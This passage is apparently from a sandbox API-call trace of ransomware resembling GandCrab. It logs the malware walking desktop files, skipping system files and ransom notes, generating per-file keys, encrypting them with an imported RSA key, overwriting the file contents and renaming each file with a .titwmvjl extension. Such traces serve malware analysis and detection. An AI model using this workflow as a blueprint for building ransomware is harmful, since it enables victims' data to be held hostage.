(lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi") returned 71 [0088.743] VirtualAlloc (lpAddress=0x0, dwSize=0xce, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.743] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi.titwmvjl") returned 80 [0088.744] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi") returned 71 [0088.744] lstrlenW (lpString=".avi") returned 4 [0088.744] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.744] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".avi ") returned 5 [0088.744] lstrcmpiW (lpString1=".avi", lpString2=".titwmvjl") returned -1 [0088.744] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.744] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi") returned 71 [0088.744] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi") returned 71 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="desktop.ini") returned 1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="autorun.inf") returned 1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="ntuser.dat") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="iconcache.db") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="bootsect.bak") returned 1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="boot.ini") returned 1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="ntuser.dat.log") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="thumbs.db") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="KRAB-DECRYPT.html") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="CRAB-DECRYPT.html") returned 1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="KRAB-DECRYPT.txt") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="ntldr") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="NTDETECT.COM") returned -1 [0088.744] lstrcmpiW (lpString1="HXpQea.avi", lpString2="Bootfont.bin") returned 1 [0088.744] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi") returned 71 [0088.744] lstrlenW (lpString=".avi") returned 4 [0088.744] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.745] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".avi ") returned 5 [0088.745] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.745] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.745] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\hxpqea.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.745] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.745] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.746] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.746] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.746] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.747] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.748] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.748] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.748] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.748] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.748] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.748] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.748] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.749] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.750] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.750] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.750] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.750] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.750] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.750] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.750] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.751] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.751] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5033b8) returned 1 [0088.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.752] CryptGetKeyParam (in: hKey=0x5033b8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.752] CryptEncrypt (in: hKey=0x5033b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.752] GetLastError () returned 0x0 [0088.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.752] CryptDestroyKey (hKey=0x5033b8) returned 1 [0088.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.752] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.752] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.753] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.754] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x5038f8) returned 1 [0088.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.754] CryptGetKeyParam (in: hKey=0x5038f8, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.754] CryptEncrypt (in: hKey=0x5038f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.754] GetLastError () returned 0x0 [0088.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.754] CryptDestroyKey (hKey=0x5038f8) returned 1 [0088.754] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.755] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.755] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.755] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.755] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0xa762, lpOverlapped=0x0) returned 1 [0088.761] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xffff589e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.761] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xa762, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0xa762, lpOverlapped=0x0) returned 1 [0088.762] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.762] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.763] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.767] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.767] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.768] CloseHandle (hObject=0x2c4) returned 1 [0088.768] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\hxpqea.avi"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\HXpQea.avi.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\hxpqea.avi.titwmvjl"), dwFlags=0x1) returned 1 [0088.769] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.769] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.769] lstrcmpW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2=".") returned 1 [0088.769] lstrcmpW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="..") returned 1 [0088.769] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="Rm7mUg-xRozimEV7t.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg" [0088.769] lstrlenW (lpString=".titwmvjl") returned 9 [0088.769] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg") returned 82 [0088.769] VirtualAlloc (lpAddress=0x0, dwSize=0xe4, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.769] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg.titwmvjl") returned 91 [0088.769] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg") returned 82 [0088.769] lstrlenW (lpString=".jpg") returned 4 [0088.769] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.769] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0088.769] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0088.769] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.770] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg") returned 82 [0088.770] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg") returned 82 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="desktop.ini") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="autorun.inf") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="ntuser.dat") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="iconcache.db") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="bootsect.bak") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="boot.ini") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="ntuser.dat.log") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="thumbs.db") returned -1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="CRAB-DECRYPT.html") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="ntldr") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="NTDETECT.COM") returned 1 [0088.770] lstrcmpiW (lpString1="Rm7mUg-xRozimEV7t.jpg", lpString2="Bootfont.bin") returned 1 [0088.770] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg") returned 82 [0088.770] lstrlenW (lpString=".jpg") returned 4 [0088.770] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.770] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".jpg ") returned 5 [0088.770] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.770] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.771] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\rm7mug-xrozimev7t.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2c4 [0088.771] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.771] ReadFile (in: hFile=0x2c4, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ecb4*=0x21c, lpOverlapped=0x0) returned 1 [0088.772] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.772] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.772] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.773] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.773] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.774] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.774] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259ec70 | out: pbBuffer=0x259ec70) returned 1 [0088.774] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.774] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.774] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.774] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.774] CryptAcquireContextW (in: phProv=0x259ebe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebe4*=0x4c9980) returned 1 [0088.775] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0088.776] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0088.776] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0088.776] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259ec90 | out: pbBuffer=0x259ec90) returned 1 [0088.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.776] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.776] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.776] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.776] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.777] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503478) returned 1 [0088.777] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.778] CryptGetKeyParam (in: hKey=0x503478, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.778] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.778] CryptEncrypt (in: hKey=0x503478, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.778] GetLastError () returned 0x0 [0088.778] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.778] CryptDestroyKey (hKey=0x503478) returned 1 [0088.778] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.779] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.779] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.779] CryptAcquireContextW (in: phProv=0x259ebd8, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259ebd8*=0x4c9980) returned 1 [0088.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.780] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259ebdc | out: phKey=0x259ebdc*=0x503638) returned 1 [0088.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.780] CryptGetKeyParam (in: hKey=0x503638, dwParam=0x8, pbData=0x259ebd0, pdwDataLen=0x259ebd4, dwFlags=0x0 | out: pbData=0x259ebd0*=0x800, pdwDataLen=0x259ebd4*=0x4) returned 1 [0088.780] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.780] CryptEncrypt (in: hKey=0x503638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259ec08*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259ec08*=0x100) returned 1 [0088.781] GetLastError () returned 0x0 [0088.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.781] CryptDestroyKey (hKey=0x503638) returned 1 [0088.781] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0088.781] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0088.781] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0088.781] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0088.781] ReadFile (in: hFile=0x2c4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ecb4*=0x17322, lpOverlapped=0x0) returned 1 [0088.788] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0xfffe8cde, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.788] WriteFile (in: hFile=0x2c4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x17322, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ec98*=0x17322, lpOverlapped=0x0) returned 1 [0088.789] SetFilePointerEx (in: hFile=0x2c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.789] WriteFile (in: hFile=0x2c4, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ec98, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ec98*=0x21c, lpOverlapped=0x0) returned 1 [0088.791] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.794] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.794] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.795] CloseHandle (hObject=0x2c4) returned 1 [0088.795] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\rm7mug-xrozimev7t.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\Rm7mUg-xRozimEV7t.jpg.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\f_rdbnja3k3ozw0f\\fpvesj\\is9ekw\\rm7mug-xrozimev7t.jpg.titwmvjl"), dwFlags=0x1) returned 1 [0088.796] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.796] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0088.796] lstrcmpW (lpString1="S7Vw5e-7gWds.odp", lpString2=".") returned 1 [0088.796] lstrcmpW (lpString1="S7Vw5e-7gWds.odp", lpString2="..") returned 1 [0088.796] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\", lpString2="S7Vw5e-7gWds.odp" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp") returned="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp" [0088.796] lstrlenW (lpString=".titwmvjl") returned 9 [0088.796] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp") returned 77 [0088.796] VirtualAlloc (lpAddress=0x0, dwSize=0xda, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0088.796] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp.titwmvjl") returned 86 [0088.796] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f_RDBNJa3K3oZw0f\\fpvESJ\\iS9EkW\\S7Vw5e-7gWds.odp") returned 77 [0088.796] lstrlenW (lpString=".odp") returned 4 [0088.796] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0088.796] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".odp ") returned 5 [0088.796] lstrcmpiW (lpString1=".odp", lpString2=".titwmvjl") returned -1 